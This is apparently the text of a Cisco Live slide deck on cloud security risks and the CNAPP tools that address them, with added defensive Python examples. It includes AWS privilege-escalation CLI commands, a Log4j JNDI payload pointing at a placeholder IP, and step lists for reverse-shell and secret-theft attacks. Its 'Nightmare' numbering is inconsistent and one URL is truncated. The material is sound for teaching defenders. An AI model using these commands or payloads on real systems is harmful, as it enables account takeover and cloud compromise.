Why You Need a CNAPP ASAP (PDF, 108 pages)
Cisco Live #CiscoLive, session BRKETI-2903
Tim Szigeti, Principal Technical Marketing Engineer (@tim_szigeti)
Why You Need a CNAPP ASAP! The Five Biggest Security Nightmares Waiting to Happen to Your Cloud Applications and How to Protect Your Business from Them
2023 Cisco and/or its affiliates. All rights reserved. Cisco Public

Questions? Use the Cisco Webex App to chat with the speaker after the session: find this session in the Cisco Live Mobile App (BRKETI-2903), click "Join the Discussion", install the Webex App or go directly to the Webex space, and enter messages/questions there. Webex spaces will be moderated by the speaker until June 9, 2023.

Agenda
- Introduction to 5 Cloud Security Nightmares
  1) Exploitable APIs
  2) Misconfigured Infrastructure
  3) Privilege Escalations
  4) Advanced Attack Paths
  5) New Critical Vulnerabilities
- Summary and Key Takeaways

Introduction
"More than 85% of organizations will embrace a cloud-first principle by 2025 and will not be able to fully execute on their digital strategies without the use of cloud-native architectures and technologies" - Gartner, "Use of Cloud-Native Technologies Will Be Pervasive, not Just Popular"

Legacy (Monolithic) Application Architecture: application / operating system / hardware.

Legacy Application Security: hardware / operating system / hypervisor, with each virtual machine running one application.

Application Architecture Evolution: from application / operating system / hardware to cloud native, where the application is split into services that communicate over APIs, gRPC and TCP.

Cloud Native Security Challenges: How Do You Secure Apps That Look Like This? (diagrams of many interconnected microservices)

Protecting Apps from Development to Runtime: Plan, Code, Build, Test, Release, Deploy, Operate, Monitor.

Security Commonly Remains an Afterthought: security posture is evaluated only at runtime, by SecOps.

Shift-Left Goal for Cloud Native App Security:
- Development (AppDev): provide security insights and tools for developers
- Deployment (DevOps): provide security insights and tools for DevOps
- Runtime (SecOps): provide security insights and tools for SecOps

Cloud Native Application Security Vulnerabilities (across the Plan-to-Monitor lifecycle):
- Advanced multi-vector attacks
- Artifact vulnerabilities
- Software vulnerabilities and exposures
- Infrastructure as Code (IaC) vulnerabilities and exposures
- Cloud security posture
- Workload vulnerabilities
- Runtime exposures
- Kubernetes security posture
- Infrastructure entitlements and privileges
- Network configuration, segmentation, and policy
- API vulnerabilities

How Serious is the Problem?
- $10.5T: forecast of global costs of cybercrime by 2025 [2]
- $4.3M: average cost of a breach in 2022, a 20% increase from 2017 [1]
- 99% of cloud failures are due to cloud misconfigurations [3]
- 2%: share of security spend from cloud spend (vs. 7-10% for broader IT) [4]
Sources: 1. IBM Cost of a Data Breach Report 2022; 2. McKinsey Cyber Security Trends 2022; 3. Gartner's estimate; 4. Morgan Stanley (Dec 22)

Secure the code-to-production stack: DevSecOps best practices, practiced by everyone.
- Dev: secure the logic of your app (developer influence, shift-left)
- Deploy: secure your workload
- Runtime: secure the cloud resources it runs on (SecOps influence, shift-right)

Prioritize with precision. Remediate the risks that matter first. Attack Path Analysis across:
- Cloud Security Posture Management, automate and simplify: compliance monitoring, resource management
- Cloud Workload Protection, continuous risk management: virtual machines, containers, serverless
- Code + Build Security, prioritize and remediate: full development lifecycle, governance policies, Infrastructure as Code
- App + API Security, assess and monitor: internal and external APIs, API tokens

Nightmare #1: New Critical Vulnerabilities

How Serious is the Problem? 78% of identified attack paths use known vulnerabilities (CVEs) as an initial access attack vector. Source: Orca 2022 State of Public Cloud Security Report

Demo: Detecting Software Vulnerabilities and Exposures (screenshots): Software Vulnerability Detection; Software Bill of Materials (SBOM); Software Image Scanning; SBOM Graph Query; Software Vulnerability Exposure Attack Path; Malware Infections; Attack Path Dashboard; Critical Malware Infections; Critical Vulnerabilities; Critical Vulnerabilities Attack Path Details.

Cloud Native Security Requirements and Toolsets (so far):
- Artifact Scanning: Software Composition Analysis (SCA)
- Software Exposure Scanning: Common Vulnerabilities and Exposures (CVEs)
- Runtime Protection: Cloud Workload Protection Platform (CWPP)
Nightmare #2: Exploited APIs

Anatomy of an API (Application Programming Interface), described by an OpenAPI Spec (Swagger). Example: a frontend calling a bookings service.
- POST /reservation: request data (JSON), header data (key/value), response data (JSON)
- GET /reservation/moid: header data (key/value), response data (JSON)
Each call passes through AuthN (authentication) and AuthZ (authorization) on its way to bookings.

Security of an API, software and transport concerns:
- Vulnerable software components in the frontend image (user/frontend:1.1): base image, runtime engine, application code
- Transport: tcp/443 with mTLS between frontend and bookings
- Permitted connections at L3, at L7, and by security policy

Security of an API, application layer (L7) concerns:
- AuthN token
- Spec analysis
- Broken Object Level Authorization (AuthZ)
- Broken Function Level Authorization (AuthZ)

How Serious is the Problem? Source: Gartner and Salt
- 286% quarterly increase in API attacks in 2022
- #1: API attacks will become the most-frequent attack vector
- 20% of organizations have experienced a breach resulting from insecure APIs

Demo: Detecting and Protecting Against API Exploits (screenshots): API Security Dashboard; API Risk Finding Summary; Internal API Analysis; External/Third-Party API Analysis; API and Connection Policies.

Cloud Native Security Requirements and Toolsets (so far):
- Artifact Scanning: Software Composition Analysis (SCA); API security analysis
- Software Exposure Scanning: Common Vulnerabilities and Exposures (CVEs)
- Runtime Protection: Cloud Workload Protection Platform (CWPP); API protection
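The Broken Object Level Authorization item above is the one API weakness that no transport control (mTLS, permitted L3/L7 connections) catches, because the request is authenticated and well-formed. The following is an added example, not code from the Cisco Live deck or from Panoptica, modelled on the slides' GET /reservation/moid call: a vulnerable lookup beside a hardened one, behind a small dispatcher that does AuthN from the header. All names (Reservation, BOOKINGS, TOKENS, handle_get) and the sample data are constructed for the example.

```python
# Added example, not from the Cisco Live deck: object-level authorization on
# GET /reservation/{moid}, modelled on the frontend -> bookings API of the slides.
# All names (Reservation, BOOKINGS, TOKENS, handle_get) are hypothetical.
from dataclasses import dataclass
from typing import Callable, Dict, Tuple


@dataclass(frozen=True)
class Reservation:
    moid: str      # object id used in the URL path
    owner: str     # subject the booking belongs to
    details: str


# Constructed sample data standing in for the bookings store.
BOOKINGS: Dict[str, Reservation] = {
    "r-100": Reservation("r-100", "alice", "SFO-LAS 2023-06-05"),
    "r-101": Reservation("r-101", "bob", "LAS-SFO 2023-06-09"),
}

# Constructed AuthN table: bearer token -> authenticated subject.
TOKENS: Dict[str, str] = {"tok-alice": "alice", "tok-bob": "bob"}


class NotFound(Exception):
    pass


def get_reservation_bola(caller: str, moid: str) -> Reservation:
    """Vulnerable lookup: the caller is authenticated, but ownership of the
    requested object is never checked (Broken Object Level Authorization)."""
    if moid not in BOOKINGS:
        raise NotFound(moid)
    return BOOKINGS[moid]


def get_reservation_checked(caller: str, moid: str) -> Reservation:
    """Hardened lookup: the AuthZ decision is made per object, next to the
    data access, and a foreign object is reported exactly like a missing one
    so the endpoint does not confirm that another user's booking exists."""
    r = BOOKINGS.get(moid)
    if r is None or r.owner != caller:
        raise NotFound(moid)
    return r


def handle_get(headers: Dict[str, str], moid: str,
               lookup: Callable[[str, str], Reservation]) -> Tuple[int, dict]:
    """Dispatch GET /reservation/{moid}: AuthN from the Authorization header
    (the key/value header data in the spec), then delegate to `lookup`, which
    is where object-level AuthZ must happen."""
    token = headers.get("Authorization", "")
    if token.startswith("Bearer "):
        token = token[len("Bearer "):]
    caller = TOKENS.get(token.strip())
    if caller is None:
        return 401, {"error": "unauthenticated"}
    try:
        r = lookup(caller, moid)
    except NotFound:
        return 404, {"error": "not found"}
    return 200, {"moid": r.moid, "details": r.details}


if __name__ == "__main__":
    bob = {"Authorization": "Bearer tok-bob"}
    # Bob asks for Alice's booking: the BOLA handler serves it, the checked one does not.
    print(handle_get(bob, "r-100", get_reservation_bola))
    print(handle_get(bob, "r-100", get_reservation_checked))
```

The design point is that the ownership test lives in the data-access function rather than in a separate middleware: a runtime API-protection tool can observe that one token is reading many different moids, but only the handler can know which objects the subject is entitled to.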
Nightmare #2: Misconfigured Infrastructure

Tesla Cryptojacking Attack, exploit of public-facing assets and embedded secrets. Attack path: attacker (any IP) -> key pair -> IAM account -> S3 bucket; cryptomining scripts -> EC2 instance. Source: RedLock report, https://blog.redlock.io/cryptojacking-tesla

Pegasus Airlines Data Breach, exploit of public-facing unprotected data. Attack path: attacker (any IP) -> S3 bucket. Source: SafetyDetectives Pegasus Leak Report, https:/
The S3 bucket contained an "Electronic Flight Bag" (EFB). This included the source code of the software their pilots use for all aircraft operations, as well as all related data, including:
- flight charts and navigation materials
- takeoff/landing, refueling, and safety procedures
- details relating to various other in-flight processes
The bucket also contained plain-text passwords and secret keys that someone could use to tamper with extra-sensitive files. Additionally, 1.6M files of crew PII, including photos of staff and their signatures, were leaked. In total, almost 23 million files were found on the bucket, totaling around 6.5 TB of data. This exposure could have impacted the safety of every Pegasus passenger and crew member around the world. Affiliated airlines that are using PegasusEFB could also have been affected.

How Serious is the Problem? Source: Orca 2022 State of Public Cloud Security Report
- 70% of organizations have a Kubernetes API server that is publicly accessible
- 72% of organizations have at least one S3 bucket that allows public "read" access
- 36% of organizations keep unencrypted secrets and personally identifiable information (PII) in these cloud services

Demo: Detecting Misconfigurations, Embedded Secrets and Exposed Data (screenshots): Recon.cloud; Configuration Issues; Exposed Secrets; Exposed Data (e.g. S3 buckets); Attack Paths, Configuration Risks; Attack Paths, Exposed Secrets; Exposed Secrets Attack Path Detail.

Cloud Native Security Requirements and Toolsets (so far):
- Artifact Scanning: Software Composition Analysis (SCA); API security analysis
- Software Exposure Scanning: Common Vulnerabilities and Exposures (CVEs)
- Runtime Protection: Cloud Workload Protection Platform (CWPP); API protection
- Cloud Configuration Hardening: Kubernetes Security Posture Management (KSPM); Cloud Security Posture Management (CSPM)
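The "public read" S3 finding behind the Pegasus breach and the 72% statistic above is the kind of check a CSPM tool runs continuously. As an added example (not code from the deck or from any Cisco product), here is the logic of such a check: it evaluates a bucket policy for unconditional grants to everyone, a legacy ACL for grants to the AllUsers/AuthenticatedUsers groups, and then applies the bucket's Block Public Access settings, which override both. The bucket descriptions are constructed dicts shaped like the GetBucketPolicy, GetBucketAcl and GetPublicAccessBlock responses; assess_bucket and the sample bucket names are hypothetical.

```python
# Added example, not from the deck: a CSPM-style "public read" check for S3.
# Input dicts are constructed to resemble GetBucketPolicy / GetBucketAcl /
# GetPublicAccessBlock responses; assess_bucket and the sample names are hypothetical.
import json
from typing import List

READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:*", "*"}
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}


def _as_list(value) -> list:
    """IAM/S3 policy JSON allows a string or a list in most positions."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_public_principal(principal) -> bool:
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def policy_findings(policy: dict) -> List[str]:
    """Allow statements granting a read action to everyone with no Condition.
    Conditional grants are skipped: they need case-by-case review."""
    out = []
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue
        if not _is_public_principal(stmt.get("Principal")):
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action"))}
        hit = sorted(actions & READ_ACTIONS)
        if hit:
            out.append(f"policy '{stmt.get('Sid', '<no Sid>')}' allows {hit} to everyone")
    return out


def acl_findings(acl: dict) -> List[str]:
    """Legacy ACL grants to the AllUsers / AuthenticatedUsers groups."""
    out = []
    for grant in acl.get("Grants", []):
        group = PUBLIC_GROUPS.get(grant.get("Grantee", {}).get("URI", ""))
        if group and grant.get("Permission") in ("READ", "FULL_CONTROL"):
            out.append(f"ACL grants {grant['Permission']} to {group}")
    return out


def assess_bucket(bucket: dict) -> List[str]:
    """Block Public Access overrides both mechanisms: RestrictPublicBuckets
    neutralises a public bucket policy, IgnorePublicAcls neutralises public ACLs."""
    pab = bucket.get("PublicAccessBlock", {})
    findings = []
    if not pab.get("RestrictPublicBuckets", False):
        findings += policy_findings(bucket.get("Policy", {}))
    if not pab.get("IgnorePublicAcls", False):
        findings += acl_findings(bucket.get("Acl", {}))
    return findings


# Constructed sample: a world-readable policy plus a public ACL grant.
PUBLIC_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                 "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::efb-archive/*"}]
}""")
PUBLIC_ACL = {"Grants": [{"Grantee": {"Type": "Group",
                                      "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
                          "Permission": "READ"}]}

EXPOSED_BUCKET = {"Name": "efb-archive", "Policy": PUBLIC_POLICY, "Acl": PUBLIC_ACL}
# Same policy and ACL, but Block Public Access turned on: no effective exposure.
BLOCKED_BUCKET = {"Name": "efb-archive", "Policy": PUBLIC_POLICY, "Acl": PUBLIC_ACL,
                  "PublicAccessBlock": {"RestrictPublicBuckets": True, "IgnorePublicAcls": True}}

if __name__ == "__main__":
    for b in (EXPOSED_BUCKET, BLOCKED_BUCKET):
        print(b["Name"], assess_bucket(b))
```

The check deliberately reports the blocked bucket as clean even though its policy and ACL are public: a posture tool that ignores the Block Public Access layer produces false positives, and one that ignores ACLs misses the buckets that were made public long before bucket policies existed.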
Nightmare #4: Privilege Escalations

Privilege Escalation Example
- Step 1: Create a new user
- Step 2: Permit the "PutUserPolicy" action
- Step 3: Create a JSON policy with full action permissions (e.g. "AdminPriv.json")
- Step 4: Apply the new policy to the new user:

    szigeti@SZIGETI-M-G9KV bin % aws iam put-user-policy --user-name test_user_privilege_escalation --policy-name AdminPriv --policy-document file:///Users/szigeti/Desktop/AdminPriv.json --profile privileged
    szigeti@SZIGETI-M-G9KV bin %

  (test_user_privilege_escalation is the new user account; AdminPriv is the new policy, i.e. full admin rights)

Additional Privilege Escalation Examples (Source: Rhino Security Labs)
- Creating a new policy version:
    aws iam create-policy-version --policy-arn target_policy_arn --policy-document file:///path/to/administrator/policy.json --set-as-default
- Setting the default policy version to an existing version:
    aws iam set-default-policy-version --policy-arn target_policy_arn --version-id v2
- Creating an EC2 instance with an existing instance profile:
    aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
- Creating a new user access key:
    aws iam create-access-key --user-name target_user
- Creating a new login profile:
    aws iam create-login-profile --user-name target_user --password '|3rxYGGl368)O,-$1B"zKejZZ.X1;6Tf;/CQQeXSoth)KZ7v?hq.#dh49=fT;|,lyTKOLG7JqH$LV5U9OZ",jJiT-D(' --no-password-reset-required
- Updating an existing login profile:
    aws iam update-login-profile --user-name target_user --password '|3rxYGGl368)O,-$1B"zKejZZ.X1;6Tf;/CQQeXSoth)KZ7v?hq.#dh49=fT;|,lyTKOLG7JqH$LV5U9OZ",jJiT-D(' --no-password-reset-required
- Attaching a policy to a user:
    aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
- Attaching a policy to a group:
    aws iam attach-group-policy --group-name group_i_am_in --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
- Attaching a policy to a role:
    aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
- Creating/updating an inline policy for a user:
    aws iam put-user-policy --user-name my_username --policy-name my_inline_policy --policy-document file:///path/to/administrator/policy.json
- Creating/updating an inline policy for a group:
    aws iam put-group-policy --group-name group_i_am_in --policy-name group_inline_policy --policy-document file:///path/to/administrator/policy.json
- Creating/updating an inline policy for a role:
    aws iam put-role-policy --role-name role_i_can_assume --policy-name role_inline_policy --policy-document file:///path/to/administrator/policy.json
- Adding a user to a group:
    aws iam add-user-to-group --group-name target_group --user-name my_username
- Updating the AssumeRolePolicyDocument of a role:
    aws iam update-assume-role-policy --role-name role_i_can_assume --policy-document file:///path/to/assume/role/policy.json
- Passing a role to a new Lambda function, then invoking it:
    aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file:///my/python/code.py
- Passing a role to a new Lambda function, then triggering it with DynamoDB:
    aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file:///my/python/code.py
- Updating the code of an existing Lambda function:
    aws lambda update-function-code --function-name target_function --zip-file fileb:///my/lambda/code/zipped.zip
- Passing a role to Data Pipeline:
    aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
    aws datapipeline put-pipeline-definition --pipeline-id unique_string --pipeline-definition file:///path/to/my/pipeline/definition.json

How Serious is the Problem? 80% of security breaches involve privileged credentials. Source: Forrester

Demo: Detecting Privilege Escalation Threats (screenshots): Identity Risks; Identity Risks, Overview; Identity Risks, Details; Identity Risks, Remediation; Identity Risks, Investigate; Privilege Escalation Attack Paths; Privilege Escalation Attack Path Details.

Cloud Native Security Requirements and Toolsets (so far):
- Artifact Scanning: Software Composition Analysis (SCA); API security analysis
- Software Exposure Scanning: Common Vulnerabilities and Exposures (CVEs)
- Runtime Protection: Cloud Workload Protection Platform (CWPP); API protection
- Cloud Configuration Hardening: Kubernetes Security Posture Management (KSPM); Cloud Security Posture Management (CSPM); Cloud Infrastructure Entitlements Management (CIEM)
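Every method in the list above is an ordinary API call that CloudTrail records, which is what a CIEM or identity-risk detection keys on. The following is an added example, not code from the deck, from Rhino Security Labs or from any Cisco product: it maps the IAM, EC2, Lambda and Data Pipeline calls from the slides to CloudTrail event names, raises severity when a principal changes its own permissions or attaches a document allowing Action "*" on Resource "*" (the AdminPriv.json pattern of Step 3), and ignores RunInstances calls that pass no instance profile. The CloudTrail records are constructed, one JSON object per line; analyze_event and scan_events are hypothetical names.

```python
# Added example, not from the deck or Rhino Security Labs: flag CloudTrail
# events matching the privilege escalation methods listed on the slides.
# The records in SAMPLE_LOG are constructed; analyze_event/scan_events are hypothetical.
import json
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# API calls from the slides that grant or pass privileges, keyed by CloudTrail eventSource.
PRIVESC_ACTIONS: Dict[str, set] = {
    "iam.amazonaws.com": {
        "PutUserPolicy", "PutGroupPolicy", "PutRolePolicy",
        "AttachUserPolicy", "AttachGroupPolicy", "AttachRolePolicy",
        "CreatePolicyVersion", "SetDefaultPolicyVersion",
        "CreateAccessKey", "CreateLoginProfile", "UpdateLoginProfile",
        "AddUserToGroup", "UpdateAssumeRolePolicy",
    },
    "ec2.amazonaws.com": {"RunInstances"},
    "lambda.amazonaws.com": {"CreateFunction", "UpdateFunctionCode"},
    "datapipeline.amazonaws.com": {"CreatePipeline", "PutPipelineDefinition"},
}
ROLE_PASSING_SOURCES = {"ec2.amazonaws.com", "lambda.amazonaws.com", "datapipeline.amazonaws.com"}


def normalize_event_name(name: str) -> str:
    """Lambda events carry an API version suffix (e.g. CreateFunction20150331)."""
    return re.sub(r"\d{8}(v\d+)?$", "", name)


def _as_list(value) -> list:
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def grants_full_admin(document: Optional[str]) -> bool:
    """True if a policy document allows Action * on Resource *.
    CloudTrail URL-encodes policyDocument, so decode before parsing."""
    if not document:
        return False
    try:
        policy = json.loads(unquote(document))
    except ValueError:
        return False
    for stmt in _as_list(policy.get("Statement")):
        if (stmt.get("Effect") == "Allow" and "*" in _as_list(stmt.get("Action"))
                and "*" in _as_list(stmt.get("Resource"))):
            return True
    return False


def analyze_event(event: dict) -> Optional[dict]:
    source = event.get("eventSource", "")
    name = normalize_event_name(event.get("eventName", ""))
    if name not in PRIVESC_ACTIONS.get(source, set()):
        return None
    params = event.get("requestParameters") or {}
    actor = event.get("userIdentity", {}).get("userName")
    target = params.get("userName") or params.get("groupName") or params.get("roleName")
    reasons, severity = [], "medium"
    if source in ROLE_PASSING_SOURCES:
        if source == "ec2.amazonaws.com" and not params.get("iamInstanceProfile"):
            return None  # RunInstances only matters when a role is passed
        reasons.append("IAM role passed to a compute/service resource")
    if target and target == actor:
        severity = "high"
        reasons.append("principal changed its own permissions")
    if grants_full_admin(params.get("policyDocument")):
        severity = "high"
        reasons.append("policy document grants * on *")
    return {"eventTime": event.get("eventTime"), "eventName": name, "actor": actor,
            "target": target, "sourceIPAddress": event.get("sourceIPAddress"),
            "severity": severity, "reasons": reasons}


def scan_events(lines: List[str]) -> List[dict]:
    """Run the check over CloudTrail records serialised one JSON object per line."""
    findings = [analyze_event(json.loads(line)) for line in lines if line.strip()]
    return [f for f in findings if f]


# Constructed CloudTrail records (not real log data); the first mirrors Step 4 above.
SAMPLE_LOG = [
    json.dumps({"eventTime": "2023-06-05T17:02:11Z", "eventSource": "iam.amazonaws.com",
                "eventName": "PutUserPolicy", "sourceIPAddress": "203.0.113.7",
                "userIdentity": {"type": "IAMUser", "userName": "test_user_privilege_escalation"},
                "requestParameters": {"userName": "test_user_privilege_escalation", "policyName": "AdminPriv",
                                      "policyDocument": "%7B%22Statement%22%3A%5B%7B%22Effect%22%3A%22Allow%22%2C"
                                                        "%22Action%22%3A%22*%22%2C%22Resource%22%3A%22*%22%7D%5D%7D"}}),
    json.dumps({"eventTime": "2023-06-05T17:05:40Z", "eventSource": "lambda.amazonaws.com",
                "eventName": "CreateFunction20150331", "userIdentity": {"type": "IAMUser", "userName": "dev1"},
                "requestParameters": {"functionName": "my_function", "role": "arn:aws:iam::111122223333:role/lambda_role"}}),
    json.dumps({"eventTime": "2023-06-05T17:06:02Z", "eventSource": "ec2.amazonaws.com", "eventName": "RunInstances",
                "userIdentity": {"type": "IAMUser", "userName": "dev1"}, "requestParameters": {"instanceType": "t2.micro"}}),
    json.dumps({"eventTime": "2023-06-05T17:07:30Z", "eventSource": "s3.amazonaws.com", "eventName": "ListBuckets",
                "userIdentity": {"type": "IAMUser", "userName": "dev1"}}),
]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_LOG):
        print(finding["severity"], finding["eventName"], finding["actor"], finding["reasons"])
```

Run over the sample, the self-granted AdminPriv policy comes out as high with two reasons and the Lambda role pass as medium; the RunInstances without an instance profile and the ListBuckets call produce nothing. In production the medium findings are the ones worth correlating with the slides' attack-path view, since passing a role to a function is routine for DevOps and malicious only when the role outranks the caller.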
Nightmare #6: Advanced Attack Paths

How Serious is the Problem? 3: the average number of steps in an attack path to reach a crown jewel asset. Sources: Forrester; Orca 2022 State of Public Cloud Security Report

MITRE ATT&CK Framework for Cloud. Source: https://attack.mitre.org/matrices/enterprise/cloud/

Advanced Attack, abstract example (tactics laid out on the ATT&CK cloud matrix). Source: https://attack.mitre.org/matrices/enterprise/cloud/

Advanced Attack, Example 1. Components: attacker user agent (any IP), Front-End, User API, Order API, MongoDB, attacker LDAP server, attacker pwncat listener.
1. Inject attacker LDAP server address: ${jndi:ldap://1.2.3.4:1389/a}
2. Attacker LDAP server address passed to User API
3. Attacker LDAP server address passed to MongoDB
4. Order API pod output triggers the log4j vulnerability and receives instructions to connect to the LDAP server
5. Order API pod connects to attacker LDAP server
6. Attacker injects Java class and reverse shell commands
7. Order API establishes a reverse shell to attacker pwncat

Advanced Attack, Example 1 (cont). Additional components: IAM account, K8s API.
8. Attacker installs kubectl (if absent)
9. Attacker discovers pods and cluster roles via kubectl
10. Attacker gets secrets and all service accounts via kubectl
11. Attacker pulls the token from Order API to find the Kube API
12. Attacker pulls additional secrets from the Kube API service
13. Attacker pulls the AWS STS key
14. Attacker is now in full control of the cluster and any other AWS resources managed by the AWS STS key

Advanced Attack, Example 2. Components: attacker (any IP), Shodan, attacker pwncat.
1. Attacker uses Shodan to find broken Jenkins pipelines (Shodan reconnaissance screenshot)
2. Attacker connects to a broken Jenkins pipeline and updates the software assets and IaC Kubernetes YAML files to recreate the cluster role with poisoned commands, including instructions to connect to the attacker's pwncat
3. Poisoned software assets and/or IaC get spun up any place in the world
4. Poisoned software sets up a reverse shell to the attacker pwncat for them to control

Demo: Detecting Advanced Attack Paths
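Both examples are chains of individually modest weaknesses whose combination reaches the AWS STS key, which is why the deck keeps returning to attack path analysis rather than isolated findings. As an added example (not code from the deck or from Panoptica), here is the core of such an analysis on a constructed asset graph that encodes both chains: a breadth-first search for the fewest-hop path from internet-facing assets to a crown jewel, and a search for chokepoint edges whose single removal breaks every path, which is the "remediate the risks that matter first" prioritisation in miniature. Node names, edge labels and the function names are hypothetical.

```python
# Added example, not from the deck: minimal attack-path analysis over a
# constructed asset graph encoding the slides' Example 1 and Example 2.
# Node names, edge labels, shortest_attack_path and chokepoints are hypothetical.
from collections import defaultdict, deque
from typing import Dict, List, Optional, Set, Tuple

Edge = Tuple[str, str, str]   # (from asset, to asset, weakness that allows the hop)

# Constructed graph: Example 1 (Log4j -> K8s secrets -> STS key) and Example 2 (exposed Jenkins).
EDGES: List[Edge] = [
    ("internet", "front-end", "public ingress from any IP"),
    ("front-end", "user-api", "forwards untrusted input"),
    ("user-api", "order-api", "forwards untrusted input"),
    ("user-api", "mongodb", "database credentials in pod"),
    ("order-api", "kube-api", "log4j JNDI lookup gives a shell; service-account token mounted"),
    ("internet", "jenkins", "broken Jenkins pipeline reachable from any IP"),
    ("jenkins", "kube-api", "pipeline applies IaC with a cluster role"),
    ("kube-api", "cluster-secrets", "cluster role can read all secrets"),
    ("cluster-secrets", "aws-sts-key", "AWS STS credentials stored as a secret"),
]
ENTRY_POINTS: Set[str] = {"internet"}
CROWN_JEWELS: Set[str] = {"aws-sts-key"}


def shortest_attack_path(edges: List[Edge], entry: Set[str], jewels: Set[str]) -> Optional[List[str]]:
    """Breadth-first search from the internet-facing assets to the first crown
    jewel reached; BFS guarantees the returned path has the fewest hops."""
    adjacency: Dict[str, List[str]] = defaultdict(list)
    for src, dst, _ in edges:
        adjacency[src].append(dst)
    queue = deque((node, [node]) for node in sorted(entry))
    seen = set(entry)
    while queue:
        node, path = queue.popleft()
        if node in jewels:
            return path
        for nxt in adjacency[node]:
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [nxt]))
    return None


def chokepoints(edges: List[Edge], entry: Set[str], jewels: Set[str]) -> List[Edge]:
    """Edges whose removal alone disconnects every entry point from every
    crown jewel: fixing one of these weaknesses breaks all known paths."""
    result = []
    for i, edge in enumerate(edges):
        remaining = edges[:i] + edges[i + 1:]
        if shortest_attack_path(remaining, entry, jewels) is None:
            result.append(edge)
    return result


def describe(edges: List[Edge], entry: Set[str], jewels: Set[str]) -> str:
    """Human-readable shortest path with the weakness used at each hop."""
    path = shortest_attack_path(edges, entry, jewels)
    if path is None:
        return "no attack path to a crown jewel"
    labels = {(s, d): w for s, d, w in edges}
    hops = [f"{path[i]} -> {path[i + 1]} [{labels[(path[i], path[i + 1])]}]"
            for i in range(len(path) - 1)]
    return f"{len(path) - 1} steps: " + "; ".join(hops)


if __name__ == "__main__":
    print(describe(EDGES, ENTRY_POINTS, CROWN_JEWELS))
    for src, dst, weakness in chokepoints(EDGES, ENTRY_POINTS, CROWN_JEWELS):
        print(f"fix first: {src} -> {dst} ({weakness})")
```

On this graph the shortest path is the Jenkins one (four steps), and the two chokepoints are the cluster role that can read every secret and the STS credential stored as a Kubernetes secret: patching log4j or locking down Jenkins each closes only one of the two entry chains, while removing the STS key from the cluster closes both.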
Summary, Key Takeaways and Next Steps

Cloud Native Security Requirements and Toolsets (complete):
- Artifact Scanning: Static App Security Testing (SAST); Dynamic App Security Testing (DAST); Software Composition Analysis (SCA); API security analysis
- Software Exposure Scanning: CVEs; secrets; sensitive data; malware
- Infrastructure as Code (IaC) Scanning
- Cloud Configuration Hardening: Kubernetes Security Posture Management (KSPM); Cloud Security Posture Management (CSPM); Cloud Infrastructure Entitlements Management (CIEM); network configuration and segmentation policy
- Runtime Protection: Cloud Workload Protection Platform (CWPP); API protection
- Attack Path Analysis
- Runtime Exposure Scanning: CVEs; secrets; sensitive data; malware

Next Steps: start using Panoptica for free at panoptica.app

Continue Your Cloud Native Security Learning: visit Outshift in the World of Solutions (booth #3307) to learn more about Panoptica.

Continue your education: visit the Cisco Showcase for related demos; book a one-on-one Meet the Engineer meeting; attend the interactive education with DevNet, Capture the Flag, and Walk-in Labs; visit the On-Demand Library for more sessions.

2023 Cisco and/or its affiliates. All rights reserved. Cisco Public. BRKETI-2903 #CiscoLive